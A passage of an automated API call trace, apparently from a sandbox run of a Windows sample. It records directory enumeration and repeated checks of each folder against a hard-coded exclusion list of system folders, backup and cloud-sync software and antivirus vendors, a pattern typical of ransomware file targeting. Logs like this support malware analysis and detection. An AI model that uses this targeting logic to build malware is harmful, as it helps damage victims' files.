ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0058.119] CharUpperBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", cchLength=0x26 | out: lpsz="C:\\USERS\\5P5NRGJN0JS HALPMCXZ\\DESKTOP\\") returned 0x26 [0058.119] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.119] CharUpperBuffW (in: lpsz="\\PERFLOGS\\", cchLength=0xa | out: lpsz="\\PERFLOGS\\") returned 0xa [0058.119] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.119] CharUpperBuffW (in: lpsz="\\WINDOWS\\", cchLength=0x9 | out: lpsz="\\WINDOWS\\") returned 0x9 [0058.119] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.119] CharUpperBuffW (in: lpsz="\\WINDOWS.OLD\\", cchLength=0xd | out: lpsz="\\WINDOWS.OLD\\") returned 0xd [0058.119] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.119] CharUpperBuffW (in: lpsz="\\WINDOWS10UPGRADE\\", cchLength=0x12 | out: lpsz="\\WINDOWS10UPGRADE\\") returned 0x12 [0058.119] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.119] CharUpperBuffW (in: lpsz="\\$RECYCLE.BIN\\", cchLength=0xe | out: lpsz="\\$RECYCLE.BIN\\") returned 0xe [0058.119] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.119] CharUpperBuffW (in: lpsz="\\WINDOWS NT\\", cchLength=0xc | out: lpsz="\\WINDOWS NT\\") returned 0xc [0058.119] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.119] CharUpperBuffW (in: lpsz="\\COMMON FILES\\", cchLength=0xe | out: lpsz="\\COMMON FILES\\") returned 0xe [0058.119] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.119] CharUpperBuffW (in: lpsz="\\TEMP\\", cchLength=0x6 | out: lpsz="\\TEMP\\") returned 0x6 [0058.119] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.119] CharUpperBuffW (in: lpsz="\\BOOT\\", cchLength=0x6 | out: lpsz="\\BOOT\\") returned 0x6 [0058.119] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.119] CharUpperBuffW (in: lpsz="\\MSOCACHE\\", cchLength=0xa | out: lpsz="\\MSOCACHE\\") returned 0xa [0058.119] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.120] CharUpperBuffW (in: lpsz="\\DEFAULT USER\\", cchLength=0xe | out: lpsz="\\DEFAULT USER\\") returned 0xe [0058.120] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.120] CharUpperBuffW (in: lpsz="FILES\\ACRONIS\\", cchLength=0xe | out: lpsz="FILES\\ACRONIS\\") returned 0xe [0058.120] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.120] CharUpperBuffW (in: lpsz="(X86)\\ACRONIS\\", cchLength=0xe | out: lpsz="(X86)\\ACRONIS\\") returned 0xe [0058.120] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.120] CharUpperBuffW (in: lpsz="FILES\\BACKUPCLIENT\\", cchLength=0x13 | out: lpsz="FILES\\BACKUPCLIENT\\") returned 0x13 [0058.120] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.120] CharUpperBuffW (in: lpsz="(X86)\\BACKUPCLIENT\\", cchLength=0x13 | out: lpsz="(X86)\\BACKUPCLIENT\\") returned 0x13 [0058.120] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.120] CharUpperBuffW (in: lpsz="FILES\\BACKUP MANAGER\\", cchLength=0x15 | out: lpsz="FILES\\BACKUP MANAGER\\") returned 0x15 [0058.120] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.120] CharUpperBuffW (in: lpsz="(X86)\\BACKUP MANAGER\\", cchLength=0x15 | out: lpsz="(X86)\\BACKUP MANAGER\\") returned 0x15 [0058.120] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.120] CharUpperBuffW (in: lpsz="FILES\\CARBONITE\\", cchLength=0x10 | out: lpsz="FILES\\CARBONITE\\") returned 0x10 [0058.120] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.120] CharUpperBuffW (in: lpsz="(X86)\\CARBONITE\\", cchLength=0x10 | out: lpsz="(X86)\\CARBONITE\\") returned 0x10 [0058.120] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.120] CharUpperBuffW (in: lpsz="FILES\\GOOGLE\\DRIVE\\", cchLength=0x13 | out: lpsz="FILES\\GOOGLE\\DRIVE\\") returned 0x13 [0058.120] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.121] CharUpperBuffW (in: lpsz="(X86)\\GOOGLE\\DRIVE\\", cchLength=0x13 | out: lpsz="(X86)\\GOOGLE\\DRIVE\\") returned 0x13 [0058.121] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.121] CharUpperBuffW (in: lpsz="FILES\\DROPBOX\\", cchLength=0xe | out: lpsz="FILES\\DROPBOX\\") returned 0xe [0058.121] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.121] CharUpperBuffW (in: lpsz="(X86)\\DROPBOX\\", cchLength=0xe | out: lpsz="(X86)\\DROPBOX\\") returned 0xe [0058.121] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.121] CharUpperBuffW (in: lpsz="FILES\\MICROSOFT ONEDRIVE\\", cchLength=0x19 | out: lpsz="FILES\\MICROSOFT ONEDRIVE\\") returned 0x19 [0058.121] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.121] CharUpperBuffW (in: lpsz="(X86)\\MICROSOFT ONEDRIVE\\", cchLength=0x19 | out: lpsz="(X86)\\MICROSOFT ONEDRIVE\\") returned 0x19 [0058.121] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.121] CharUpperBuffW (in: lpsz="FILES\\ONEDRIVE\\", cchLength=0xf | out: lpsz="FILES\\ONEDRIVE\\") returned 0xf [0058.121] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.121] CharUpperBuffW (in: lpsz="(X86)\\ONEDRIVE\\", cchLength=0xf | out: lpsz="(X86)\\ONEDRIVE\\") returned 0xf [0058.121] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.121] CharUpperBuffW (in: lpsz="VNC\\", cchLength=0x4 | out: lpsz="VNC\\") returned 0x4 [0058.121] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.121] CharUpperBuffW (in: lpsz="\\INTERNET EXPLORER\\", cchLength=0x13 | out: lpsz="\\INTERNET EXPLORER\\") returned 0x13 [0058.121] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.121] CharUpperBuffW (in: lpsz="\\MICROSOFT\\OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\OFFICE\\") returned 0x12 [0058.121] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.121] CharUpperBuffW (in: lpsz="\\MICROSOFT OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT OFFICE\\") returned 0x12 [0058.121] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.121] CharUpperBuffW (in: lpsz="\\WINDOWS SIDEBAR\\", cchLength=0x11 | out: lpsz="\\WINDOWS SIDEBAR\\") returned 0x11 [0058.121] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.121] CharUpperBuffW (in: lpsz="\\WINDOWS MEDIA PLAYER\\", cchLength=0x16 | out: lpsz="\\WINDOWS MEDIA PLAYER\\") returned 0x16 [0058.122] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.122] CharUpperBuffW (in: lpsz="\\DVD MAKER\\", cchLength=0xb | out: lpsz="\\DVD MAKER\\") returned 0xb [0058.122] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.122] CharUpperBuffW (in: lpsz="\\WINDOWSPOWERSHELL\\", cchLength=0x13 | out: lpsz="\\WINDOWSPOWERSHELL\\") returned 0x13 [0058.122] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.122] CharUpperBuffW (in: lpsz="\\WINDOWS DEFENDER\\", cchLength=0x12 | out: lpsz="\\WINDOWS DEFENDER\\") returned 0x12 [0058.122] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.122] CharUpperBuffW (in: lpsz="\\TOR BROWSER\\", cchLength=0xd | out: lpsz="\\TOR BROWSER\\") returned 0xd [0058.122] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.122] CharUpperBuffW (in: lpsz="\\ASPNET_CLIENT\\", cchLength=0xf | out: lpsz="\\ASPNET_CLIENT\\") returned 0xf [0058.122] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.122] CharUpperBuffW (in: lpsz="\\REFERENCE ASSEMBLIES\\", cchLength=0x16 | out: lpsz="\\REFERENCE ASSEMBLIES\\") returned 0x16 [0058.122] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.122] CharUpperBuffW (in: lpsz="\\MICROSOFT\\PROVISIONING\\", cchLength=0x18 | out: lpsz="\\MICROSOFT\\PROVISIONING\\") returned 0x18 [0058.122] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.122] CharUpperBuffW (in: lpsz="\\MICROSOFT SILVERLIGHT\\", cchLength=0x17 | out: lpsz="\\MICROSOFT SILVERLIGHT\\") returned 0x17 [0058.122] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.123] CharUpperBuffW (in: lpsz="\\PROGRAMDATA\\MICROSOFT\\", cchLength=0x17 | out: lpsz="\\PROGRAMDATA\\MICROSOFT\\") returned 0x17 [0058.123] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.123] CharUpperBuffW (in: lpsz="\\MICROSOFT\\CRYPTO\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\CRYPTO\\") returned 0x12 [0058.123] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.123] CharUpperBuffW (in: lpsz="\\WINDOWSAPPS\\", cchLength=0xd | out: lpsz="\\WINDOWSAPPS\\") returned 0xd [0058.123] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.123] CharUpperBuffW (in: lpsz="\\7-ZIP\\", cchLength=0x7 | out: lpsz="\\7-ZIP\\") returned 0x7 [0058.123] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.123] CharUpperBuffW (in: lpsz="\\WINRAR\\", cchLength=0x8 | out: lpsz="\\WINRAR\\") returned 0x8 [0058.123] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.123] CharUpperBuffW (in: lpsz="\\ESET", cchLength=0x5 | out: lpsz="\\ESET") returned 0x5 [0058.123] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.123] CharUpperBuffW (in: lpsz="\\AVAST", cchLength=0x6 | out: lpsz="\\AVAST") returned 0x6 [0058.123] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.123] CharUpperBuffW (in: lpsz="\\MALWAREBYTES", cchLength=0xd | out: lpsz="\\MALWAREBYTES") returned 0xd [0058.123] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.124] CharUpperBuffW (in: lpsz="\\SYMANTEC ENDPOINT", cchLength=0x12 | out: lpsz="\\SYMANTEC ENDPOINT") returned 0x12 [0058.124] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.124] CharUpperBuffW (in: lpsz="\\TREND MICRO", cchLength=0xc | out: lpsz="\\TREND MICRO") returned 0xc [0058.124] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.124] CharUpperBuffW (in: lpsz="\\BITDEFENDER", cchLength=0xc | out: lpsz="\\BITDEFENDER") returned 0xc [0058.124] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.124] CharUpperBuffW (in: lpsz="\\PANDA SECURITY", cchLength=0xf | out: lpsz="\\PANDA SECURITY") returned 0xf [0058.124] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.124] CharUpperBuffW (in: lpsz="\\MCAFEE", cchLength=0x7 | out: lpsz="\\MCAFEE") returned 0x7 [0058.124] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.124] CharUpperBuffW (in: lpsz="\\KASPERSKY LAB", cchLength=0xe | out: lpsz="\\KASPERSKY LAB") returned 0xe [0058.124] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.124] CharUpperBuffW (in: lpsz="\\KASPERSKYLAB", cchLength=0xd | out: lpsz="\\KASPERSKYLAB") returned 0xd [0058.124] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.124] CharUpperBuffW (in: lpsz="\\AVDEFENDER", cchLength=0xb | out: lpsz="\\AVDEFENDER") returned 0xb [0058.124] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.124] CharUpperBuffW (in: lpsz="\\SOPHOS", cchLength=0x7 | out: lpsz="\\SOPHOS") returned 0x7 [0058.125] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.125] CharUpperBuffW (in: lpsz="\\AVG", cchLength=0x4 | out: lpsz="\\AVG") returned 0x4 [0058.125] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0058.125] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*.*", lpFindFileData=0x18f604 | out: lpFindFileData=0x18f604*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6946c8 [0058.125] FindNextFileW (in: hFindFile=0x6946c8, lpFindFileData=0x18f604 | out: lpFindFileData=0x18f604*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.125] FindNextFileW (in: hFindFile=0x6946c8, lpFindFileData=0x18f604 | out: lpFindFileData=0x18f604*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0058.126] FindClose (in: hFindFile=0x6946c8 | out: hFindFile=0x6946c8) returned 1 [0058.126] FindNextFileW (in: hFindFile=0x694688, lpFindFileData=0x18f8f4 | out: lpFindFileData=0x18f8f4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0058.126] CharUpperBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", cchLength=0x26 | out: lpsz="C:\\USERS\\5P5NRGJN0JS HALPMCXZ\\DESKTOP\\") returned 0x26 [0058.126] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.126] CharUpperBuffW (in: lpsz="\\PERFLOGS\\", cchLength=0xa | out: lpsz="\\PERFLOGS\\") returned 0xa [0058.126] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.126] CharUpperBuffW (in: lpsz="\\WINDOWS\\", cchLength=0x9 | out: lpsz="\\WINDOWS\\") returned 0x9 [0058.126] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.126] CharUpperBuffW (in: lpsz="\\WINDOWS.OLD\\", cchLength=0xd | out: lpsz="\\WINDOWS.OLD\\") returned 0xd [0058.126] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.126] CharUpperBuffW (in: lpsz="\\WINDOWS10UPGRADE\\", cchLength=0x12 | out: lpsz="\\WINDOWS10UPGRADE\\") returned 0x12 [0058.126] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.127] CharUpperBuffW (in: lpsz="\\$RECYCLE.BIN\\", cchLength=0xe | out: lpsz="\\$RECYCLE.BIN\\") returned 0xe [0058.127] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.127] CharUpperBuffW (in: lpsz="\\WINDOWS NT\\", cchLength=0xc | out: lpsz="\\WINDOWS NT\\") returned 0xc [0058.127] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.127] CharUpperBuffW (in: lpsz="\\COMMON FILES\\", cchLength=0xe | out: lpsz="\\COMMON FILES\\") returned 0xe [0058.127] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.127] CharUpperBuffW (in: lpsz="\\TEMP\\", cchLength=0x6 | out: lpsz="\\TEMP\\") returned 0x6 [0058.127] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.127] CharUpperBuffW (in: lpsz="\\BOOT\\", cchLength=0x6 | out: lpsz="\\BOOT\\") returned 0x6 [0058.127] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.127] CharUpperBuffW (in: lpsz="\\MSOCACHE\\", cchLength=0xa | out: lpsz="\\MSOCACHE\\") returned 0xa [0058.127] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.127] CharUpperBuffW (in: lpsz="\\DEFAULT USER\\", cchLength=0xe | out: lpsz="\\DEFAULT USER\\") returned 0xe [0058.127] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.127] CharUpperBuffW (in: lpsz="FILES\\ACRONIS\\", cchLength=0xe | out: lpsz="FILES\\ACRONIS\\") returned 0xe [0058.127] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.127] CharUpperBuffW (in: lpsz="(X86)\\ACRONIS\\", cchLength=0xe | out: lpsz="(X86)\\ACRONIS\\") returned 0xe [0058.128] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.128] CharUpperBuffW (in: lpsz="FILES\\BACKUPCLIENT\\", cchLength=0x13 | out: lpsz="FILES\\BACKUPCLIENT\\") returned 0x13 [0058.128] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.128] CharUpperBuffW (in: lpsz="(X86)\\BACKUPCLIENT\\", cchLength=0x13 | out: lpsz="(X86)\\BACKUPCLIENT\\") returned 0x13 [0058.128] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.128] CharUpperBuffW (in: lpsz="FILES\\BACKUP MANAGER\\", cchLength=0x15 | out: lpsz="FILES\\BACKUP MANAGER\\") returned 0x15 [0058.128] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.128] CharUpperBuffW (in: lpsz="(X86)\\BACKUP MANAGER\\", cchLength=0x15 | out: lpsz="(X86)\\BACKUP MANAGER\\") returned 0x15 [0058.128] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.128] CharUpperBuffW (in: lpsz="FILES\\CARBONITE\\", cchLength=0x10 | out: lpsz="FILES\\CARBONITE\\") returned 0x10 [0058.128] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.128] CharUpperBuffW (in: lpsz="(X86)\\CARBONITE\\", cchLength=0x10 | out: lpsz="(X86)\\CARBONITE\\") returned 0x10 [0058.128] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.128] CharUpperBuffW (in: lpsz="FILES\\GOOGLE\\DRIVE\\", cchLength=0x13 | out: lpsz="FILES\\GOOGLE\\DRIVE\\") returned 0x13 [0058.128] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.128] CharUpperBuffW (in: lpsz="(X86)\\GOOGLE\\DRIVE\\", cchLength=0x13 | out: lpsz="(X86)\\GOOGLE\\DRIVE\\") returned 0x13 [0058.129] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.129] CharUpperBuffW (in: lpsz="FILES\\DROPBOX\\", cchLength=0xe | out: lpsz="FILES\\DROPBOX\\") returned 0xe [0058.129] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.129] CharUpperBuffW (in: lpsz="(X86)\\DROPBOX\\", cchLength=0xe | out: lpsz="(X86)\\DROPBOX\\") returned 0xe [0058.129] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.129] CharUpperBuffW (in: lpsz="FILES\\MICROSOFT ONEDRIVE\\", cchLength=0x19 | out: lpsz="FILES\\MICROSOFT ONEDRIVE\\") returned 0x19 [0058.129] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.129] CharUpperBuffW (in: lpsz="(X86)\\MICROSOFT ONEDRIVE\\", cchLength=0x19 | out: lpsz="(X86)\\MICROSOFT ONEDRIVE\\") returned 0x19 [0058.129] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.129] CharUpperBuffW (in: lpsz="FILES\\ONEDRIVE\\", cchLength=0xf | out: lpsz="FILES\\ONEDRIVE\\") returned 0xf [0058.129] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.129] CharUpperBuffW (in: lpsz="(X86)\\ONEDRIVE\\", cchLength=0xf | out: lpsz="(X86)\\ONEDRIVE\\") returned 0xf [0058.129] CharUpperBuffW (in: 